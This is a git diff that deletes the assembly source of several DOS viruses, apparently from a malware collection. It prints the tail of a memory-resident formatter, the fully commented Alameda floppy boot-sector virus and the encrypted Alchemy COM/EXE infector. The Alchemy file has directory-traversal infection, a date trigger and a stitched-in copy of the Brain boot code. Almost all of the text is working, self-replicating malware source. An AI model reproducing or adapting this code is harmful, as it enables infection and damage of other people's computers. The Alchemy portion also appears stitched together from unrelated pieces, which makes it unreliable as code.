pop ax - mov data_86,ax - call sub_62 - call sub_72 - mov ah,data_69 - call sub_73 - call data_85 - jc loc_253 ; Jump if carry Set - call sub_79 - call sub_69 - jc loc_253 ; Jump if carry Set - jmp data_86 -loc_253: - clc ; Clear carry flag - call sub_7 - jmp loc_123 -sub_75 endp - - -; -; SUBROUTINE -; - -sub_76 proc near - mov ah,data_70 - call sub_71 - mov ah,data_29 - cmp data_64,0 - je loc_254 ; Jump if equal - or ah,4 -loc_254: - call sub_71 - mov ah,data_65 - call sub_71 - mov ah,data_64 - call sub_71 - mov 
ah,data_66 - call sub_71 - mov ah,2 - call sub_71 - mov ah,data_56 - call sub_71 - mov ah,data_57 - call sub_71 - mov ah,0FFh - call sub_71 - retn -sub_76 endp - - mov ah,4Dh ; 'M' - call sub_71 - mov ah,data_29 - cmp data_64,0 - je loc_255 ; Jump if equal - or ah,4 -loc_255: - call sub_71 - mov ah,2 - call sub_71 - mov ah,data_56 - call sub_71 - mov ah,data_58 - call sub_71 - mov ah,data_59 - call sub_71 - retn - -; -; SUBROUTINE -; - -sub_77 proc near - mov ah,4 - call sub_71 - mov ah,data_29 - call sub_71 - call sub_70 - mov data_76,al - retn -sub_77 endp - - -; -; SUBROUTINE -; - -sub_78 proc near - pop ax - mov data_87,ax - call sub_48 - mov ax,data_61 - mov data_67,ax - mov data_68,14Dh - mov data_69,4Ah ; 'J' - mov data_85,2837h - call sub_75 - test data_73,0C0h - jnz loc_256 ; Jump if not zero - jmp data_87 -loc_256: - test data_74,2 - jz loc_257 ; Jump if zero - jmp loc_86 -loc_257: - cmp data_94,2 - jne loc_258 ; Jump if not equal - mov data_94,0 - jmp loc_93 -loc_258: - inc data_94 - call sub_65 - test data_73,0C0h - jnz loc_259 ; Jump if not zero - jmp data_82 -loc_259: - jmp loc_123 -sub_78 endp - - -; -; SUBROUTINE -; - -sub_79 proc near - mov cx,18h - -locloop_260: - call sub_7 - cmp byte ptr ds:[22Fh],0 - jne loc_261 ; Jump if not equal - retn -loc_261: - loop locloop_260 ; Loop if cx > 0 - - pop ax - jmp loc_123 -sub_79 endp - -data_214 db 0 -data_215 dw 0 - db 8 dup (0) -data_217 dw 0 - db 26 dup (0) -data_218 dw 0 -data_219 dw 0 - db 469 dup (0) -data_220 db 0 - db 154 dup (0) -data_221 db 0Dh, 0Ah, ' Mem Resident Format A' - db 'lready Installed', 0Dh, 0Ah, 'Al' - db 't + Left Shift + Right Shift Wil' - db 'l Activate', 0Dh, 0Ah, '$' -data_222 db 0Dh, 0Ah, 'Background Formatter I' - db 's Installed', 0Dh, 0Ah, 'Alt + L' - db 'eft Shift + Right Shift Will Act' - db 'ivate', 0Dh, 0Ah, '$' -data_223 db 0Dh, 0Ah, 'No Diskette Drive Conn' - db 'ect', 0Dh, 0Ah, 'Program Termina' - db 'ted !', 0Dh, 0Ah, '$' - db 'There Are ' -data_224 db 0 - db ' 
Diskette Drives Connected' - db 0 -data_225 db 0 - db 20h,0C4h - db 14 dup (0C4h) -data_227 db ' ', 0 - db 'Is This Configuration Correct ? ' - db '[Y]', 0 - db 'How Many Diskette Drives ( Not I' - db 'nclude Fixed Disk ) ?', 0 - db 'DRIVE ', 0 - db ' ( 0 - 360K, 1 - 1.2M, 2 - 720K,' - db ' 3 - 1.44M ) ?', 0 -loc_262: - push cs - pop ds - push cs - pop es - call sub_86 - mov word ptr ds:[1E2h],cs - mov word ptr ds:[1E4h],cs - mov word ptr ds:[1DAh],cs - mov word ptr ds:[1E0h],cs - mov word ptr data_24,0EBFEh - cli ; Disable interrupts - mov word ptr ds:[1E6h],ss - mov word ptr ds:[1E8h],sp - push cs - pop ss - mov sp,2B84h - mov ax,202h - push ax - push cs - mov ax,data_81 - push ax - mov word ptr ds:[1DCh],sp - mov ss,word ptr ds:[1E6h] - mov sp,word ptr ds:[1E8h] - sti ; Enable interrupts - call sub_80 - call sub_23 - call sub_88 - call sub_24 - mov al,0Eh - mov si,19Dh - mov dx,12CCh - call sub_87 - mov al,13h - mov si,1A1h - mov dx,12E6h - call sub_87 - mov al,9 - mov si,199h - mov dx,127Ah - call sub_87 - mov al,8 - mov si,195h - mov dx,11E0h - call sub_87 - mov dx,offset data_222 ; ('') - mov ah,9 - int 21h ; DOS Services ah=function 09h - ; display char string at ds:dx - mov al,0 - mov dx,2B84h - mov cl,4 - shr dx,cl ; Shift w/zeros fill - add dx,11h - mov ah,31h ; '1' - int 21h ; DOS Services ah=function 31h - ; terminate & stay resident - ; al=return code,dx=paragraphs - -; -; SUBROUTINE -; - -sub_80 proc near - push es - mov es,cs:data_25 - mov dx,es:video_port_ - add dx,6 - mov cs:data_90,dx - pop es - int 11h ; Put equipment bits in ax - mov bh,al - and bh,30h ; '0' - mov data_91,0B800h - cmp bh,30h ; '0' - jne loc_263 ; Jump if not equal - mov data_91,0B000h -loc_263: - mov bh,al - and bh,1 - and ax,0C0h - shl ax,1 ; Shift w/zeros fill - shl ax,1 ; Shift w/zeros fill - add ah,bh - cmp ah,0 - jne loc_264 ; Jump if not equal - mov dx,offset data_223 ; ('') - mov ah,9 - int 21h ; DOS Services ah=function 09h - ; display char string at ds:dx - jmp loc_277 
-loc_264: - mov al,ah - cmp al,3 - jl loc_265 ; Jump if < - mov al,2 -loc_265: - mov data_28,al - or al,30h ; '0' - mov data_224,al - call sub_81 - retn - -; External Entry into Subroutine - -sub_81: - push ax - push es - push di - mov bx,0Dh - mov dx,0 -loc_266: - mov si,dx - push ax - push bx - push dx - mov ah,8 - int 13h ; Disk dl=drive a ah=func 08h - ; get drive parameters, bl=type - ; cx=cylinders, dh=max heads - ; es:di= ptr to drive table - jc loc_267 ; Jump if carry Set - mov al,bl - dec al - pop dx - pop bx - mov [bx+si],al - pop ax - dec ah - jz loc_268 ; Jump if zero - inc dx - jmp short loc_266 -loc_267: - add sp,6 -loc_268: - pop di - pop es - pop ax - retn - -; External Entry into Subroutine - -sub_82: - mov al,41h ; 'A' - mov dx,0C1Dh - mov di,0 - call sub_85 - retn - -; External Entry into Subroutine - -sub_83: - call sub_82 - call sub_84 - retn - -; External Entry into Subroutine - -sub_84: - mov al,42h ; 'B' - mov dx,0E1Dh - mov di,1 - call sub_85 - retn - -; External Entry into Subroutine - -sub_85: - mov data_225,al - mov si,2C8Bh - call sub_14 - mov al,[di+0Dh] - nop ;*ASM fixup - displacement - cbw ; Convrt byte to word - add ax,ax - mov si,ax - mov bx,offset data_32 - mov si,[bx+si] - call sub_15 - retn - -; External Entry into Subroutine - -sub_86: - mov ah,51h ; 'Q' - int 21h ; DOS Services ah=function 51h - ; get active PSP segment in bx - ;* undocumented function - mov data_231,bx - mov ax,300Eh - mov data_232,ax - xor ax,ax ; Zero register -loc_269: - mov ds,ax - xor si,si ; Zero register - cld ; Clear direction - lodsb ; String [si] to al - cmp al,4Dh ; 'M' - je loc_271 ; Jump if equal -loc_270: - push ds - pop ax - inc ax - jmp short loc_269 -loc_271: - push ds - mov si,data_3e - lodsw ; String [si] to ax - pop bx - add bx,ax - inc bx - jc loc_270 ; Jump if carry Set - cmp cs:data_231,bx - jb loc_270 ; Jump if below - push ds - mov ds,bx - cmp byte ptr ds:data_17e,4Dh ; 'M' - nop ;*ASM fixup - sign extn byte - je loc_272 ; Jump if 
equal - pop ds - jmp short loc_270 -loc_272: - mov di,cs:data_232 - push cs - pop es - mov bx,ds - pop ds - mov ax,ds - stosw ; Store ax to es:[di] - mov ax,bx - stosw ; Store ax to es:[di] - mov ds,bx -loc_273: - push ds - mov si,data_3e - lodsw ; String [si] to ax - pop bx - add bx,ax - inc bx - mov ax,bx - stosw ; Store ax to es:[di] - mov ds,bx - xor si,si ; Zero register - lodsb ; String [si] to al - cmp al,5Ah ; 'Z' - jne loc_273 ; Jump if not equal - xor ax,ax ; Zero register - stosw ; Store ax to es:[di] - push cs - pop ds - mov si,di - sub si,6 - lodsw ; String [si] to ax - mov data_26,ax - lodsw ; String [si] to ax - mov data_27,ax - mov si,offset data_233 -loc_274: - mov ax,[si] - cmp ax,0 - je loc_275 ; Jump if equal - mov es,ax - mov ax,es:data_2e - add ax,10h - mov es,ax - mov di,data_18e - cmp word ptr es:[di],0EBFEh - je loc_276 ; Jump if equal - add si,2 - jmp short loc_274 -loc_275: - push cs - pop es - retn -loc_276: - mov dx,offset data_221 ; ('') - mov ah,9 - int 21h ; DOS Services ah=function 09h - ; display char string at ds:dx -loc_277: - call sub_11 - mov ax,4C00h - int 21h ; DOS Services ah=function 4Ch - ; terminate with al=return code -sub_80 endp - - -; -; SUBROUTINE -; - -sub_87 proc near - push es - push ax - push si - push dx - mov ah,35h ; '5' - int 21h ; DOS Services ah=function 35h - ; get intrpt vector al in es:bx - pop dx - pop si - pop ax - mov [si],bx - mov [si+2],es - mov ah,25h ; '%' - int 21h ; DOS Services ah=function 25h - ; set intrpt vector al to ds:dx - pop es - retn -sub_87 endp - - -; -; SUBROUTINE -; - -sub_88 proc near -loc_278: - call sub_19 - mov dh,8 - mov dl,17h - mov si,2C65h - call sub_14 - mov al,data_28 - cbw ; Convrt byte to word - dec al - mov di,ax - add di,di - mov bx,offset data_229 - call word ptr [bx+di] ;* - mov dh,12h - mov dl,18h - mov si,2C9Eh - call sub_14 - call sub_13 -loc_279: - mov ah,0 - int 16h ; Keyboard i/o ah=function 00h - ; get keybd char in al, ah=scan - cmp al,0Dh - je loc_ret_282 ; 
Jump if equal - cmp al,1Bh - jne loc_280 ; Jump if not equal - jmp short loc_ret_282 - db 90h -loc_280: - and al,0DFh - cmp al,59h ; 'Y' - je loc_ret_282 ; Jump if equal - cmp al,4Eh ; 'N' - je loc_281 ; Jump if equal - call sub_11 - jmp short loc_279 -loc_281: - call sub_89 - -loc_ret_282: - retn -sub_88 endp - - -; -; SUBROUTINE -; - -sub_89 proc near - call sub_19 - mov dh,12h - mov dl,0Eh - mov si,2CC2h - call sub_14 - call sub_13 -loc_283: - mov ah,0 - int 16h ; Keyboard i/o ah=function 00h - ; get keybd char in al, ah=scan - cmp al,31h ; '1' - jge loc_285 ; Jump if > or = -loc_284: - call sub_11 - jmp short loc_283 -loc_285: - cmp al,32h ; '2' - jg loc_284 ; Jump if > - mov data_224,al - and al,0Fh - mov data_28,al - cbw ; Convrt byte to word - push ax - mov dh,8 - mov dl,17h - mov si,2C65h - call sub_14 - mov al,41h ; 'A' - mov byte ptr data_227+62h,al ; ('') - xor di,di ; Zero register - mov bx,0Dh -loc_286: - mov dh,12h - mov dl,0Eh - mov si,2CF8h - call sub_14 - call sub_13 - mov al,33h ; '3' - mov data_102,al - mov data_89,2FCDh - call sub_16 - mov [bx+di],al - push bx - push di - shl di,1 ; Shift w/zeros fill - mov bx,offset data_229 - call word ptr [bx+di] ;* - pop di - pop bx - inc di - pop ax - cmp di,ax - je loc_287 ; Jump if equal - push ax - inc byte ptr data_227+62h ; ('') - jmp short loc_286 -loc_287: - pop ax - jmp loc_278 -sub_89 endp - -data_229 dw offset sub_82 -data_230 dw offset sub_83 -data_231 dw 0 -data_232 dw 0 -data_233 dw 100 dup (0) - -seg_a ends - - - - end start diff --git a/a/ALAMEDA (17).ASM b/a/ALAMEDA (17).ASM deleted file mode 100755 index 287ade7..0000000 --- a/a/ALAMEDA (17).ASM +++ /dev/null 
@@ -1,381 +0,0 @@ -;-----------------------------------------------------------------------; -; This virus is of the "FLOPPY ONLY" variety. ; -; It replicates to the boot sector of a floppy disk and when it gains control -; it will move itself to upper memory. It redirects the keyboard ; -; interrupt (INT 09H) to look for ALT-CTRL-DEL sequences at which time ; -; it will attempt to infect any floppy it finds in drive A:. ; -; It keeps the real boot sector at track 39, sector 8, head 0 ; -; It does not map this sector bad in the fat (unlike the Pakistani Brain) -; and should that area be used by a file, the virus ; -; will die. It also contains no anti detection mechanisms as does the ; -; BRAIN virus. It apparently uses head 0, sector 8 and not head 1 ; -; sector 9 because this is common to all floppy formats both single ; -; sided and double sided. It does not contain any malevolent TROJAN ; -; HORSE code. It does appear to contain a count of how many times it ; -; has infected other diskettes although this is harmless and the count ; -; is never accessed. ; -; ; -; Things to note about this virus: ; -; It can not only live through an ALT-CTRL-DEL reboot command, but this ; -; is its primary (only for that matter) means of reproduction to other ; -; floppy diskettes. The only way to remove it from an infected system ; -; is to turn the machine off and reboot an uninfected copy of DOS. ; -; It is even resident when no floppy is booted but BASIC is loaded ; -; instead. Then when ALT-CTRL-DEL is pressed from inside of BASIC, ; -; it activates and infectes the floppy from which the user is ; -; attempting to boot. ; -; ; -; Also note that because of the POP CS command to pass control to ; -; its self in upper memory, this virus does not to work on 80286 ; -; machines (because this is not a valid 80286 instruction). 
; -; ; -; The Norton Utilities can be used to identify infected diskettes by ; -; looking at the boot sector and the DOS SYS utility can be used to ; -; remove it (unlike the Pakistani Brain). ; -;-----------------------------------------------------------------------; - ; - ORG 7C00H ; - ; -TOS LABEL WORD ;TOP OF STACK -;-----------------------------------------------------------------------; -; 1. Find top of memory and copy ourself up there. (keeping same offset); -; 2. Save a copy of the first 32 interrupt vectors to top of memory too ; -; 3. Redirect int 9 (keyboard) to ourself in top of memory ; -; 4. Jump to ourself at top of memory ; -; 5. Load and execute REAL boot sector from track 40, head 0, sector 8 ; -;-----------------------------------------------------------------------; -BEGIN: CLI ;INITIALIZE STACK - XOR AX,AX ; - MOV SS,AX ; - MOV SP,offset TOS ; - STI ; - ; - MOV BX,0040H ;ES = TOP OF MEMORY - (7C00H+512) - MOV DS,BX ; - MOV AX,[0013H] ; - MUL BX ; - SUB AX,07E0H ; (7C00H+512)/16 - MOV ES,AX ; - ; - PUSH CS ;DS = CS - POP DS ; - ; - CMP DI,3456H ;IF THE VIRUS IS REBOOTING... - JNE B_10 ; - DEC Word Ptr [COUNTER_1] ;...LOW&HI:COUNTER_1-- - ; -B_10: MOV SI,SP ;SP=7C00 ;COPY SELF TO TOP OF MEMORY - MOV DI,SI ; - MOV CX,512 ; - CLD ; - REP MOVSB ; - ; - MOV SI,CX ;CX=0 ;SAVE FIRST 32 INT VETOR ADDRESSES TO - MOV DI,offset BEGIN - 128 ; 128 BYTES BELOW OUR HI CODE - MOV CX,128 ; - REP MOVSB ; - ; - CALL PUT_NEW_09 ;SAVE/REDIRECT INT 9 (KEYBOARD) - ; - PUSH ES ;ES=HI ; JUMP TO OUR HI CODE WITH - NOP - ; - PUSH DS ;DS=0 ; ES = DS - POP ES ; - ; - MOV BX,SP ; SP=7C00 ;LOAD REAL BOOT SECTOR TO 0000:7C00 - MOV DX,CX ;CX=0 ;DRIVE A: HEAD 0 - MOV CX,2708H ; TRACK 40, SECTOR 8 - MOV AX,0201H ; READ SECTOR - INT 13H ; (common to 8/9 sect. 1/2 sided!) 
- JB $ ; HANG IF ERROR - ; - JMP JMP_BOOT ;JMP 0000:7C00 - ; -;-----------------------------------------------------------------------; -; SAVE THEN REDIRECT INT 9 VECTOR ; -; ; -; ON ENTRY: DS = 0 ; -; ES = WHERE TO SAVE OLD_09 & (HI) ; -; WHERE NEW_09 IS (HI) ; -;-----------------------------------------------------------------------; -PUT_NEW_09: ; - DEC Word Ptr [0413H] ;TOP OF MEMORY (0040:0013) -= 1024 - ; - MOV SI,9*4 ;COPY INT 9 VECTOR TO - MOV DI,offset OLD_09 ; OLD_09 (IN OUR HI CODE!) - MOV CX,0004 ; - ; - CLI ; - REP MOVSB ; - MOV Word Ptr [9*4],offset NEW_09 - MOV [(9*4)+2],ES ; - STI ; - ; - RET ; - ; -;-----------------------------------------------------------------------; -; RESET KEYBOARD, TO ACKNOWLEDGE LAST CHAR ; -;-----------------------------------------------------------------------; -ACK_KEYBD: ; - IN AL,61H ;RESET KEYBOARD THEN CONTINUE - MOV AH,AL ; - OR AL,80H ; - OUT 61H,AL ; - XCHG AL,AH ; - OUT 61H,AL ; - JMP RBOOT ; - ; -;-----------------------------------------------------------------------; -; DATA AREA WHICH IS NOT USED IN THIS VERSION ; -; REASON UNKNOWN ; -;-----------------------------------------------------------------------; -TABLE DB 27H,0,1,2 ;FORMAT INFORMATION FOR TRACK 39 - DB 27H,0,2,2 ; (CURRENTLY NOT USED) - DB 27H,0,3,2 ; - DB 27H,0,4,2 ; - DB 27H,0,5,2 ; - DB 27H,0,6,2 ; - DB 27H,0,7,2 ; - DB 27H,0,8,2 ; - ; -;A7C9A LABEL BYTE ; - DW 00024H ;NOT USED - DB 0ADH ; - DB 07CH ; - DB 0A3H ; - DW 00026H ; - ; -;L7CA1: ; - POP CX ;NOT USED - POP DI ; - POP SI ; - POP ES ; - POP DS ; - POP AX ; - POPF ; - JMP 1111:1111 ; - ; -;-----------------------------------------------------------------------; -; IF ALT & CTRL & DEL THEN ... ; -; IF ALT & CTRL & ? THEN ... 
; -;-----------------------------------------------------------------------; -NEW_09: PUSHF ; - STI ; - ; - PUSH AX ; - PUSH BX ; - PUSH DS ; - ; - PUSH CS ;DS=CS - POP DS ; - ; - MOV BX,[ALT_CTRL W] ;BX=SCAN CODE LAST TIME - IN AL,60H ;GET SCAN CODE - MOV AH,AL ;SAVE IN AH - AND AX,887FH ;STRIP 8th BIT IN AL, KEEP 8th BIT AH - ; - CMP AL,1DH ;IS IT A [CTRL]... - JNE N09_10 ;...JUMP IF NO - MOV BL,AH ;(BL=08 ON KEY DOWN, BL=88 ON KEY UP) - JMP N09_30 ; - ; -N09_10: CMP AL,38H ;IS IT AN [ALT]... - JNE N09_20 ;...JUMP IF NO - MOV BH,AH ;(BH=08 ON KEY DOWN, BH=88 ON KEY UP) - JMP N09_30 ; - ; -N09_20: CMP BX,0808H ;IF (CTRL DOWN & ALT DOWN)... - JNE N09_30 ;...JUMP IF NO - ; - CMP AL,17H ;IF [I]... - JE N09_X0 ;...JUMP IF YES - CMP AL,53H ;IF [DEL]... - JE ACK_KEYBD ;...JUMP IF YES - ; -N09_30: MOV [ALT_CTRL],BX ;SAVE SCAN CODE FOR NEXT TIME - ; -N09_90: POP DS ; - POP BX ; - POP AX ; - POPF ; - ; - DB 0EAH ;JMP F000:E987 -OLD_09 DW ? ; - DW 0F000H ; - ; -N09_X0: JMP N09_X1 ; - ; -;-----------------------------------------------------------------------; -; ; -;-----------------------------------------------------------------------; -RBOOT: MOV DX,03D8H ;DISABLE COLOR VIDEO !?!? - MOV AX,0800H ;AL=0, AH=DELAY ARG - OUT DX,AL ; - CALL DELAY ; - MOV [ALT_CTRL],AX ;AX=0 ; - ; - MOV AL,3 ;AH=0 ;SELECT 80x25 COLOR - INT 10H ; - MOV AH,2 ;SET CURSOR POS 0,0 - XOR DX,DX ; - MOV BH,DH ; PAGE 0 - INT 10H ; - ; - MOV AH,1 ;SET CURSOR TYPE - MOV CX,0607H ; - INT 10H ; - ; - MOV AX,0420H ;DELAY (AL=20H FOR EOI BELOW) - CALL DELAY ; - ; - CLI ; - OUT 20H,AL ;SEND EOI TO INT CONTROLLER - ; - MOV ES,CX ;CX=0 (DELAY) ;RESTORE FIRST 32 INT VECTORS - MOV DI,CX ; (REMOVING OUR INT 09 HANDLER!) 
- MOV SI,offset BEGIN - 128 ; - MOV CX,128 ; - CLD ; - REP MOVSB ; - ; - MOV DS,CX ;CX=0 ;DS=0 - ; - MOV Word Ptr [19H*4],offset NEW_19 ;SET INT 19 VECTOR - MOV [(19H*4)+2],CS ; - ; - MOV AX,0040H ;DS = ROM DATA AREA - MOV DS,AX ; - ; - MOV [0017H],AH ;AH=0 ;KBFLAG (SHIFT STATES) = 0 - INC Word Ptr [0013H] ;MEMORY SIZE += 1024 (WERE NOT ACTIVE) - ; - PUSH DS ;IF BIOS F000:E502 == 21E4... - MOV AX,0F000H ; - MOV DS,AX ; - CMP Word Ptr [0E502H],21E4H ; - POP DS ; - JE R_90 ; - INT 19H ; IF NOT...REBOOT - ; -R_90: JMP 0F000:0E502H ;...DO IT ?!?!?! - ; -;-----------------------------------------------------------------------; -; REBOOT INT VECTOR ; -;-----------------------------------------------------------------------; -NEW_19: XOR AX,AX ; - ; - MOV DS,AX ;DS=0 - MOV AX,[0410] ;AX=EQUIP FLAG - TEST AL,1 ;IF FLOPPY DRIVES ... - JNZ N19_20 ;...JUMP -N19_10: PUSH CS ;ELSE ES=CS - POP ES ; - CALL PUT_NEW_09 ;SAVE/REDIRECT INT 9 (KEYBOARD) - INT 18H ;LOAD BASIC - ; -N19_20: MOV CX,0004 ;RETRY COUNT = 4 - ; -N19_22: PUSH CX ; - MOV AH,00 ;RESET DISK - INT 13 ; - JB N19_81 ; - MOV AX,0201 ;READ BOOT SECTOR - PUSH DS ; - POP ES ; - MOV BX,offset BEGIN ; - MOV CX,1 ;TRACK 0, SECTOR 1 - INT 13H ; -N19_81: POP CX ; - JNB N19_90 ; - LOOP N19_22 ; - JMP N19_10 ;IF RETRY EXPIRED...LOAD BASIC - ; -;-----------------------------------------------------------------------; -; Reinfection segment. ; -;-----------------------------------------------------------------------; -N19_90: CMP DI,3456 ;IF NOT FLAG SET... - JNZ RE_INFECT ;...RE INFECT - ; -JMP_BOOT: ;PASS CONTROL TO BOOT SECTOR - JMP 0000:7C00H ; - ; -;-----------------------------------------------------------------------; -; Reinfection Segment. ; -;-----------------------------------------------------------------------; -RE_INFECT: ; - MOV SI,offset BEGIN ;COMPARE BOOT SECTOR JUST LOADED WITH - MOV CX,00E6H ; OURSELF - MOV DI,SI ; - PUSH CS ; - POP ES ; - CLD ; - REPE CMPSB ; - JE RI_12 ;IF NOT EQUAL... 
- ; - INC Word Ptr ES:[COUNTER_1] ;INC. COUNTER IN OUR CODE (NOT DS!) - ; -;MAKE SURE TRACK 39, HEAD 0 FORMATTED ; - MOV BX,offset TABLE ;FORMAT INFO - MOV DX,0000 ;DRIVE A: HEAD 0 - MOV CH,40-1 ;TRACK 39 - MOV AH,5 ;FORMAT - JMP RI_10 ;REMOVE THE FORMAT OPTION FOR NOW ! - ; -; <<< NO EXECUTION PATH TO HERE >>> ; - JB RI_80 ; - ; -;WRITE REAL BOOT SECTOR AT TRACK 39, SECTOR 8, HEAD 0 -RI_10: MOV ES,DX ;ES:BX = 0000:7C00, HEAD=0 - MOV BX,offset BEGIN ;TRACK 40H - MOV CL,8 ;SECTOR 8 - MOV AX,0301H ;WRITE 1 SECTOR - INT 13H ; - ; - PUSH CS ; (ES=CS FOR PUT_NEW_09 BELOW) - POP ES ; - JB RI_80 ;IF WRITE ERROR...JUMP TO BOOT CODE - ; - MOV CX,0001 ;WRITE INFECTED BOOT SECTOR ! - MOV AX,0301 ; - INT 13H ; - JB RI_80 ; IF ERROR...JUMP TO BOOT CODE - ; -RI_12: MOV DI,3456H ;SET "JUST INFECTED ANOTHER ONE"... - INT 19H ;...FLAG AND REBOOT - ; -RI_80: CALL PUT_NEW_09 ;SAVE/REDIRECT INT 9 (KEYBOARD) - DEC Word Ptr ES:[COUNTER_1] ; (DEC. CAUSE DIDNT INFECT) - JMP JMP_BOOT ; - ; -;-----------------------------------------------------------------------; -; ; -;-----------------------------------------------------------------------; -N09_X1: MOV [ALT_CTRL],BX ;SAVE ALT & CTRL STATUS - ; - MOV AX,[COUNTER_1] ;PUT COUNTER_1 INTO RESET FLAG - MOV BX,0040H ; - MOV DS,BX ; - MOV [0072H],AX ; 0040:0072 = RESET FLAG - JMP N09_90 ; - ; -;-----------------------------------------------------------------------; -; DELAY ; -; ; -; ON ENTRY AH:CX = LOOP COUNT ; -;-----------------------------------------------------------------------; -DELAY: SUB CX,CX ; -D_01: LOOP $ ; - SUB AH,1 ; - JNZ D_01 ; - RET ; - ; -;-----------------------------------------------------------------------; -; ; -;-----------------------------------------------------------------------; -A7DF4 DB 27H,00H,8,2 - -COUNTER_1 DW 001CH -ALT_CTRL DW 0 -A7DFC DB 27H,0,8,2 - \ No newline at end of file diff --git a/a/ALCHEMY (18).ASM b/a/ALCHEMY (18).ASM deleted file mode 100755 index 6e6a62e..0000000 
--- a/a/ALCHEMY (18).ASM
+++ /dev/null
@@ -1,1039 +0,0 @@ -; Alchemy.asm : [Arachnyphobia] by Abraxas -; Created wik the Phalcon/Skism Mass-Produced Code Generator -; from the configuration file skeleton.cfg - -.model tiny ; Handy directive -.code ; Virus code segment - org 100h ; COM file starting IP - -id = 'DA' ; ID word for EXE infections -entry_point: db 0e9h,0,0 ; jmp decrypt - -decrypt: ; handles encryption and decryption -patch_startencrypt: - mov bx,offset startencrypt ; start of decryption - mov cx,(offset heap - offset startencrypt)/2 ; iterations -decrypt_loop: - db 2eh,81h,07h ; add word ptr cs:[bx], xxxx -decrypt_value dw 0 ; initialised at zero for null effect - inc bx ; calculate new decryption location - inc bx - loop decrypt_loop ; decrypt mo' -startencrypt: - call next ; calculate delta offset -next: pop bp ; bp = IP next - sub bp,offset next ; bp = delta offset - - cmp sp,id ; COM or EXE? - je restoreEXE -restoreCOM: - lea si,[bp+save3] - mov di,100h - push di ; For later return - movsb - jmp short restoreEXIT -restoreEXE: - push ds - push es - push cs ; DS = CS - pop ds - push cs ; ES = CS - pop es - lea si,[bp+jmpsave2] - lea di,[bp+jmpsave] - movsw - movsw - movsw -restoreEXIT: - movsw - - mov byte ptr [bp+numinfec],1 ; reset infection counter - - mov ah,1Ah ; Set new DTA - lea dx,[bp+newDTA] ; new DTA @ DS:DX - int 21h - - mov ah,47h ; Get current directory - mov dl,0 ; Current drive - lea si,[bp+origdir] ; DS:SI->buffer - int 21h - mov byte ptr [bp+backslash],'\' ; Prepare for later CHDIR - - mov ax,3524h ; Get int 24 handler - int 21h ; to ES:BX - mov word ptr [bp+oldint24],bx; Save it - mov word ptr [bp+oldint24+2],es - mov ah,25h ; Set new int 24 handler - lea dx,[bp+offset int24] ; DS:DX->new handler - int 21h - push cs ; Restore ES - pop es ; 'cuz it was changed - -dir_scan: ; "dot dot" traversal - lea dx,[bp+exe_mask] - call infect_mask - lea dx,[bp+com_mask] - call infect_mask - mov ah,3bh ; change directory - lea dx,[bp+dot_dot] ; "cd .." 
- int 21h - jnc dir_scan ; go back for mo! - -done_infections: - mov ah,2ah ; Get current date - int 21h - cmp dh,10 ; Check month - jb exit_virus - cmp dl,14 ; Check date - jb exit_virus - cmp cx,1991 ; Check year - jae activate - -exit_virus: - mov ax,2524h ; Restore int 24 handler - lds dx,[bp+offset oldint24] ; to original - int 21h - push cs - pop ds - - mov ah,3bh ; change directory - lea dx,[bp+origdir-1] ; original directory - int 21h - - mov ah,1ah ; restore DTA to default - mov dx,80h ; DTA in PSP - cmp sp,id-4 ; EXE or COM? - jz returnEXE -returnCOM: - int 21h - retn ; 100h is on stack -returnEXE: - pop es - pop ds - int 21h - mov ax,es ; AX = PSP segment - add ax,10h ; Adjust for PSP - add word ptr cs:[bp+jmpsave+2],ax - add ax,word ptr cs:[bp+stacksave+2] - cli ; Clear intrpts for stack manipulation - mov sp,word ptr cs:[bp+stacksave] - mov ss,ax - sti - db 0eah ; jmp ssss:oooo -jmpsave dd ? ; Original CS:IP -stacksave dd ? ; Original SS:SP -jmpsave2 db ? ; Actually four bytes -save3 db 0cdh,20h,0 ; First 3 bytes of COM file -stacksave2 dd ? - -activate: ; Conditions satisfied - org 0 - - cli - jmp entervirus -idbytes db 34h, 12h -firsthead db 0 -firstsector dw 2707h -curhead db 0 -cursector dw 1 - db 0, 0, 0, 0 - db 'Welcome to the Dungeon ' -copyright db '(c) 1986 Brain' - db 17h - db '& Amjads (pvt) Ltd VIRUS_SHOE ' - db ' RECORD v9.0 Dedicated to th' - db 'e dynamic memories of millions o' - db 'f virus who are no longer with u' - db 's today - Thanks GOODNESS!! ' - db ' BEWARE OF THE er..VIRUS : \th' - db 'is program is catching prog' - db 'ram follows after these messeges' - db '..... $' - db '#@%$' - db '@!! 
' -entervirus: - mov ax,cs - mov ds,ax ; ds = 0 - mov ss,ax ; set stack to after - mov sp,0F000h ; virus - sti - mov al,ds:[7C00h+offset firsthead] - mov ds:[7C00h+offset curhead],al - mov cx,ds:[7C00h+offset firstsector] - mov ds:[7C00h+offset cursector],cx - call calcnext - mov cx,5 ; read five sectors - mov bx,7C00h+200h ; after end of virus - -loadnext: - call readdisk - call calcnext - add bx,200h - loop loadnext - - mov ax,word ptr ds:[413h] ; Base memory size in Kb - sub ax,7 ; - 7 Kb - mov word ptr ds:[413h],ax ; Insert as new value - mov cl,6 - shl ax,cl ; Convert to paragraphs - mov es,ax - mov si,7C00h ; Copy from virus start - mov di,0 ; to start of memory - mov cx,1004h ; Copy 1004h bytes - cld - rep movsb - push es - mov ax,200h - push ax - retf ; return to old boot sector - -readdisk: - push cx - push bx - mov cx,4 ; Try 4 times - -tryread: - push cx - mov dh,ds:[7C00h+offset curhead] - mov dl,0 ; Read sector from default - mov cx,ds:[7C00h+offset cursector] - mov ax,201h ; Disk to memory at es:bx - int 13h - jnc readOK - mov ah,0 ; Reset disk - int 13h ; (force read track 0) - pop cx - loop tryread - - int 18h ; ROM basic on failure -readOK: - pop cx - pop bx - pop cx - retn - -calcnext: - mov al,byte ptr ds:[7C00h+offset cursector] - inc al - mov byte ptr ds:[7C00h+offset cursector],al - cmp al,0Ah - jne donecalc - mov byte ptr ds:[7C00h+offset cursector],1 - mov al,ds:[7C00h+offset curhead] - inc al - mov ds:[7C00h+offset curhead],al - cmp al,2 - jne donecalc - mov byte ptr ds:[7C00h+offset curhead],0 - inc byte ptr ds:[7C00h+offset cursector+1] -donecalc: - retn - -; the following is a collection of garbage bytes - db 00h, 00h, 00h, 00h, 32h,0E3h - db 23h, 4Dh, 59h,0F4h,0A1h, 82h - db 0BCh,0C3h, 12h, 00h, 7Eh, 12h - db 0CDh, 21h,0A2h, 3Ch, 5Fh -a_data dw 050Ch -; Second part of the virus begins here - jmp short entersecondpart - db '(c) 1986 Brain & Amjads (pvt) Ltd ',0 -readcounter db 4 ; keep track of # reads -curdrive db 0 -int13flag db 0 - 
